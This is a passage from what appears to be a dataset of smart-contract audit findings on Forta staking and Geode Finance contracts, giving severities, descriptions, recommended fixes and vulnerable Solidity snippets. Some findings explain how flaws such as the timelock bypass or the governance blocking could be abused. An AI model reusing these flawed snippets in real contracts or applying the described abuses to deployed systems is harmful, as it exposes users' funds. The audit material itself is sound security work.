epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n -Lack of a check for the subject's stake for reviewSlashProposalParametersчlowчIn the `SlashingController` contract, the address with the `SLASHING_ARBITER_ROLE` may call the `reviewSlashProposalParameters()` function to adjust the slashing proposal to a new `_subjectId` and `_subjectType`. However, unlike in the `proposeSlash()` function, there is no check for that subject having any stake at all.\\nWhile it may be assumed that the review function will be called by a privileged and knowledgeable actor, this additional check may avoid accidental mistakes.\\n```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(\"subject stake\");\\n```\\n\\n```\\nif (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n}\\n```\\nчAdd a check for the new subject having stake to slash.чч```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(\"subject stake\");\\n```\\n -Comment and code inconsistenciesчlowчDuring the audit a few inconsistencies were found between what the comments say and what the implemented code actually did.\\nSubject Type Agency for Scanner Subjects\\nIn the `SubjectTypeValidator`, the comment says that the `SCANNER_SUBJECT` is of type `DIRECT` agency type, i.e. it can be directly staked on by multiple different stakers. However, we found a difference in the implementation, where the concerned subject is defined as type `MANAGED` agency type, which says that it cannot be staked on directly; instead it's a delegated type and the allocation is supposed to be managed by its manager.\\n```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n\\n```\\n} else if (subjectType == SCANNER\\_SUBJECT) {\\n return SubjectStakeAgency.MANAGED;\\n```\\n\\nDispatch refers to ERC721 tokens as ERC1155\\nOne of the comments describing the functionality to `link` and `unlink` agents and scanners refers to them as ERC1155 tokens, when in reality they are ERC721.\\n```\\n/\\*\\*\\n \\* @notice Assigns the job of running an agent to a scanner.\\n \\* @dev currently only allowed for DISPATCHER\\_ROLE (Assigner software).\\n \\* @dev emits Link(agentId, scannerId, true) event.\\n \\* @param agentId ERC1155 token id of the agent.\\n \\* @param scannerId ERC1155 token id of the scanner.\\n \\*/\\n```\\n\\nNodeRunnerRegistryCore comment that implies the reverse of what happens\\nA comment describing a helper function that returns address for a given scanner ID describes the opposite behavior. It is the same comment for the function just above that actually does what the comment says.\\n```\\n/// Converts scanner address to uint256 for FortaStaking Token Id.\\nfunction scannerIdToAddress(uint256 scannerId) public pure returns (address) {\\n return address(uint160(scannerId));\\n}\\n```\\n\\nScannerToNodeRunnerMigration comment that says that no NodeRunner tokens must be owned\\nFor the migration from Scanners to NodeRunners, a comment in the beginning of the file implies that for the system to work correctly, there must be no NodeRunner tokens owned prior to migration. After a conversation with the Forta Foundation team, it appears that this was an early design choice that is no longer relevant.\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\nчVerify the operational logic and fix either the concerned comments or defined logic as per the need.чч```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n -Oracle's _sanityCheck for prices will not work with slashingчhighчThe `_sanityCheck` is verifying that the new price didn't change significantly:\\n```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n \"OracleUtils: price is insane\"\\n```\\n\\nWhile the rewards of staking can be reasonably predicted, the balances may also be changed due to slashing. So any slashing event should reduce the price, and if enough ETH is slashed, the price will drop heavily. The oracle will not be updated because of a sanity check. After that, there will be an arbitrage opportunity, and everyone will be incentivized to withdraw as soon as possible. That process will inevitably devaluate gETH to zero. The severity of this issue is also amplified by the fact that operators have no skin in the game and won't lose anything from slashing.чMake sure that slashing can be adequately processed when updating the price.чч```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n \"OracleUtils: price is insane\"\\n```\\n -MiniGovernance - fetchUpgradeProposal will always revertчhighчIn the function `fetchUpgradeProposal()`, `newProposal()` is called with a hard coded `duration` of 4 weeks. This means the function will always revert since `newProposal()` checks that the proposal `duration` is not more than the constant `MAX_PROPOSAL_DURATION` of 2 weeks. Effectively, this leaves MiniGovernance non-upgradeable.\\n```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n\\n```\\nrequire(\\n duration <= MAX\\_PROPOSAL\\_DURATION,\\n \"GeodeUtils: duration exceeds MAX\\_PROPOSAL\\_DURATION\"\\n);\\n```\\nчSwitch the hard coded proposal duration to 2 weeks.чч```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n -Updating interfaces of derivatives is done in a dangerous and unpredictable manner.чmediumчGeode Finance codebase provides planet maintainers with the ability to enable or disable different contracts to act as the main token contract. In fact, multiple separate contracts can be used at the same time if decided so by the planet maintainer. Those contracts will have shared balances but will not share the allowances as you can see below:\\n```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n\\n```\\nmapping(address => mapping(address => uint256)) private \\_allowances;\\n```\\n\\nUnfortunately, this approach comes with some implications that are very hard to predict as they involve interactions with other systems, but is possible to say that the consequences of those implications will most always be negative. We will not be able to outline all the implications of this issue, but we can try and outline the pattern that they all would follow.\\nThere are really two ways to update an interface: set the new one and immediately unset the old one, or have them both run in parallel for some time. Let's look at them one by one.\\nin the first case, the old interface is disabled immediately. Given that interfaces share balances that will lead to some very serious consequences. Imagine the following sequence:\\nAlice deposits her derivatives into the DWP contract for liquidity mining.\\nPlanet maintainer updates the interface and immediately disables the old one.\\nDWP contract now has the old tokens and the new ones. But only the new ones are accounted for in the storage and thus can be withdrawn. Unfortunately, the old tokens are disabled meaning that now both old and new tokens are lost.\\nThis can happen in pretty much any contract and not just the DWP token. Unless the holders had enough time to withdraw the derivatives back to their wallets all the funds deposited into contracts could be lost.\\nThis leads us to the second case where the two interfaces are active in parallel. This would solve the issue above by allowing Alice to withdraw the old tokens from the DWP and make the new tokens follow. Unfortunately, there is an issue in that case as well.\\nSome DeFi contracts allow their owners to withdraw any tokens that are not accounted for by the internal accounting. DWP allows the withdrawal of admin fees if the contract has more tokens than `balances[]` store. Some contracts even allow to withdraw funds that were accidentally sent to the contract by people. Either to recover them or just as a part of dust collection. Let's call such contracts “dangerous contracts” for our purposes.\\nAlice deposits her derivatives into the dangerous contract.\\nPlanet maintainer sets a new interface.\\nOwner of the dangerous contract sees that some odd and unaccounted tokens landed in the contract. He learns those are real and are part of Geode ecosystem. So he takes them.\\nOld tokens will follow the new tokens. That means Alice now has no claim to them and the contract that they just left has broken accounting since numbers there are not backed by tokens anymore.\\nOne other issue we would like to highlight here is that despite the contracts being expected to have separate allowances, if the old contract has the allowance set, the initial 0 value of the new one will be ignored. Here is an example:\\nAlice approves Bob for 100 derivatives.\\nPlanet maintainer sets a new interface. The new interface has no allowance from Alice to Bob.\\nBob still can transfer new tokens from Alice to himself by transferring the old tokens for which he still has the allowance. New token balances will be updated accordingly.\\nAlice could also give Bob an allowance of 100 tokens in the new contract since that was her original intent, but this would mean that Bob now has 200 token allowance.\\nThis is extremely convoluted and will most likely result in errors made by the planet maintainers when updating the interfaces.чThe safest option is to only allow a list of whitelisted interfaces to be used that are well-documented and audited. Planet maintainers could then choose the once that they see fit.чч```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n -Only the GOVERNANCE can initialize the PortalчmediumчIn the Portal's `initialize` function, the `_GOVERNANCE` is passed as a parameter:\\n```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n\\nBut then it calls the `updateStakingParams` function, which requires the `msg.sender` to be the governance:\\n```\\nfunction updateStakingParams(\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD,\\n uint256 \\_PERIOD\\_PRICE\\_INCREASE\\_LIMIT,\\n uint256 \\_PERIOD\\_PRICE\\_DECREASE\\_LIMIT,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_BOOST\\_SWITCH\\_LATENCY\\n) public virtual override {\\n require(\\n msg.sender == GEODE.GOVERNANCE,\\n \"Portal: sender not GOVERNANCE\"\\n );\\n```\\n\\nSo only the future governance can initialize the `Portal`. In the case of the Geode protocol, the governance will be represented by a token contract, making it hard to initialize promptly. Initialization should be done by an actor that is more flexible than governance.чSplit the `updateStakingParams` function into public and private ones and use them accordingly.чч```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n -The maintainer of the MiniGovernance can block the changeMaintainer functionчmediumчEvery entity with an ID has a controller and a maintainer. The controller tends to have more control, and the maintainer is mostly used for operational purposes. So the controller should be able to change the maintainer if that is required. Indeed we see that it is possible in the MiniGovernance too:\\n```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n\\nHere the `changeMaintainer` function can only be called by the Portal, and only the controller can initiate that call. But the maintainer can pause the MiniGovernance, which will make this call revert because the `_refreshSenate` function has the `whenNotPaused` modifier. Thus maintainer could intentionally prevent the controller from replacing it by another maintainer.чMake sure that the controller can always change the malicious maintainer.чч```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n -Entities are not required to be initiatedчmediumчEvery entity (Planet, Comet, Operator) has a 3-step creation process:\\nCreation of the proposal.\\nApproval of the proposal.\\nInitiation of the entity.\\nThe last step is crucial, but it is never explicitly checked that the entity is initialized. The initiation always includes the `initiator` modifier that works with the `\"initiated\"` slot on DATASTORE:\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nBut this slot is never actually checked when the entities are used. While we did not find any profitable attack vector using uninitiated entities, the code will be upgraded, which may allow for possible attack vectors related to this issue.чMake sure the entities are initiated before they are used.чч```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n -The blameOperator can be called for an alienated validatorчmediumчThe `blameOperator` function is designed to be called by anyone. If some operator did not signal to exit in time, anyone can blame and imprison this operator.\\n```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n\\nThe problem is that it can be called for any state that is not `3` (self.TELESCOPE._validators[pk].state != 3). But it should only be called for active validators whose state equals `2`. So the `blameOperator` can be called an infinite amount of time for alienated or not approved validators. These types of validators cannot switch to state `3`.\\nThe severity of the issue is mitigated by the fact that this function is currently unavailable for users to call. But it is intended to be external once the withdrawal process is in place.чMake sure that you can only blame the operator of an active validator.чч```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n -Latency timelocks on certain functions can be bypassedчmediumчThe functions `switchMaintainerFee()` and `switchWithdrawalBoost()` add a latency of typically three days to the current timestamp at which the new value is meant to be valid. However, they don't limit the number of times this value can be changed within the latency period. This allows a malicious maintainer to set their desired value twice and effectively make the change immediately. Let's take the first function as an example. The first call to it sets a value as the `newFee`, moving the old value to `priorFee`, which is effectively the fee in use until the time lock is up. A follow-up call to the function with the same value as a parameter would mean the “new” value overwrites the old `priorFee` while remaining in the queue for the switch.\\n```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n \"priorFee\",\\n DATASTORE.readUintForId(id, \"fee\")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n \"feeSwitch\",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, \"fee\", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n\\n```\\nfunction getMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id\\n) internal view returns (uint256 fee) {\\n if (DATASTORE.readUintForId(id, \"feeSwitch\") > block.timestamp) {\\n return DATASTORE.readUintForId(id, \"priorFee\");\\n }\\n return DATASTORE.readUintForId(id, \"fee\");\\n}\\n```\\nчAdd a check to make sure only one value can be set between time lock periods.чч```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n \"priorFee\",\\n DATASTORE.readUintForId(id, \"fee\")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n \"feeSwitch\",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, \"fee\", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n -MiniGovernance's senate has almost unlimited validityчmediumчA new senate for the MiniGovernance contract is set in the following line:\\n```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n\\nThe validity period argument should not include `block.timestamp`, because it is going to be added a bit later in the code:\\n```\\nself.SENATE\\_EXPIRY = block.timestamp + \\_senatePeriod;\\n```\\n\\nSo currently, every senate of MiniGovernance will have much longer validity than it is supposed to.чPass onlySENATE_VALIDITY in the `_refreshSenate` function.чч```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n -Proposed validators not accounted for in the monopoly check.чmediumчThe Geode team introduced a check that makes sure that node operators do not initiate more validators than a threshold called `MONOPOLY_THRESHOLD` allows. It is used on call to `proposeStake(...)` which the operator would call in order to propose new validators. It is worth mentioning that onboarding new validator nodes requires 2 steps: a proposal from the node operator and approval from the planet maintainer. After the first step validators get a status of `proposed`. After the second step validators get the status of `active` and all eth accounting is done. The issue we found is that the `proposed` validators step performs the monopoly check but does not account for previously `proposed` but not `active` validators.\\nAssume that `MONOPOLY_THRESHOLD` is set to 5. The node operator could propose 4 new validators and pass the monopoly check and label those validators as `proposed`. The node operator could then suggest 4 more validators in a separate transaction and since the monopoly check does not check for the `proposed` validators, that would pass as well. Then in `beaconStake` or the step of maintainer approval, there is no monopoly check at all, so 8 validators could be activated at once.\\n```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, \"totalActiveValidators\") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n \"StakeUtils: IceBear does NOT like monopolies\"\\n);\\n```\\nчInclude the `(DATASTORE.readUintForId(poolId,DataStoreUtils.getKey(operatorId, \"proposedValidators\"))` into the require statement, just like in the check for the node operator allowance check.\\n```\\nrequire(\\n (DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, \"proposedValidators\")\\n ) +\\n DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, \"activeValidators\")\\n ) +\\n pubkeys.length) <=\\n operatorAllowance(DATASTORE, poolId, operatorId),\\n \"StakeUtils: NOT enough allowance\"\\n);\\n```\\nчч```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, \"totalActiveValidators\") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n \"StakeUtils: IceBear does NOT like monopolies\"\\n);\\n```\\n -Comparison operator used instead of assignment operatorчmediumч```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n\\n```\\nself.\\_validators[\\_pk].state == 3;\\n```\\nчReplace `==` with `=`.чч```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n -initiator modifier will not work in the context of one transactionчlowчEach planet, comet or operator must be initialized after the onboarding proposal is approved. In order to make sure that these entities are not initialized more than once `initiateOperator`, `initiateComet` and `initiatePlanet` have the `initiator` modifier.\\n```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n\\n```\\nfunction initiateComet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 6, id, maintainer) {\\n```\\n\\n```\\nfunction initiateOperator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 4, id, maintainer) {\\n```\\n\\nInside that modifier, we check that the `initiated` flag is 0 and if so we proceed to initialization. We later update it to the current timestamp.\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nUnfortunately, this does not follow the checks-effects-interractions pattern. If one for example would call `initiatePlanet` again from the body of the modifier, this check will still pass making it susceptible to a reentrancy attack. While we could not find a way to exploit this in the current engagement, given that system is designed to be upgradable this could become a risk in the future. For example, if during the initialization of the planet the maintainer will be allowed to pass a custom interface that could potentially allow reentering.чBring the line that updated the `initiated` flag to the current timestamp before the `_;`.\\n```\\nDATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n```\\nчч```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n -Incorrect accounting for the burned gEthчlowчGeode Portal records the amount of minted and burned gETH on any given day during the active period of the oracle. One case where some gETH is burned is when the users redeem gETH for ETH. In the burn function we burn the spentGeth - `gEthDonation` but in the accounting code we do not account for `gEthDonation` so the code records more assets burned than was really burned.\\n```\\nDATASTORE.subUintForId(poolId, \"surplus\", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n \"burnBuffer\"\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\nчRecord the `spentGeth` - gEthDonation instead of just `spentGeth` in the burn buffer.\\n```\\nDATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n```\\nчч```\\nDATASTORE.subUintForId(poolId, \"surplus\", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n \"burnBuffer\"\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n -Boost calculation on fetchUnstake should not be using the cumBalance when it is larger than debt.чlowчThe Geode team implemented the 2-step withdrawal mechanism for the staked ETH. First, node operators signal their intent to withdraw the stake, and then the oracle will trigger all of the accounting of rewards, balances, and buybacks if necessary. Buybacks are what we are interested in at this time. Buybacks are performed by checking if the derivative asset is off peg in the Dynamic Withdrawal Pool contract. Once the debt is larger than some ignorable threshold an arbitrage buyback will be executed. A portion of the arbitrage profit will go to the node operator. The issue here is that when simulating the arbitrage swap in the `calculateSwap` call we use the cumulative un-stake balance rather than ETH debt preset in the DWP. In the case where the withdrawal cumulative balance is higher than the debt node operator will receive a higher reward than intended.\\n```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\nчUse the `debt` amount of ETH in the boost reward calculation when the cumulative balance is larger than the `debt`.чч```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n -DataStore struct not having the _gap for upgrades.чlowч```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n\\nIt is worth mentioning that Geode contracts are meant to support the upgradability pattern. Given that information, one should be careful not to overwrite the storage variables by reordering the old ones or adding the new once not at the end of the list of variables when upgrading. The issue comes with the fact that structs seem to give a false sense of security making it feel like they are an isolated set of storage variables that will not override anything else. In reality, struts are just tuples that are expanded in storage sequentially just like all the other storage variables. For that reason, if you have two struct storage variables listed back to back like in the code above, you either need to make sure not to change the order or the number of variables in the structs other than the last one between upgrades or you need to add a `uint256[N] _gap` array of fixed size to reserve some storage slots for the future at the end of each struct. The Geode Finance team is missing the gap in the `DataStrore` struct making it non-upgradable.\\n```\\nstruct DataStore {\\n mapping(uint256 => uint256[]) allIdsByType;\\n mapping(bytes32 => uint256) uintData;\\n mapping(bytes32 => bytes) bytesData;\\n mapping(bytes32 => address) addressData;\\n}\\n```\\nчWe suggest that gap is used in DataStore as well. Since it was used for all the other structs we consider it just a typo.чч```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private 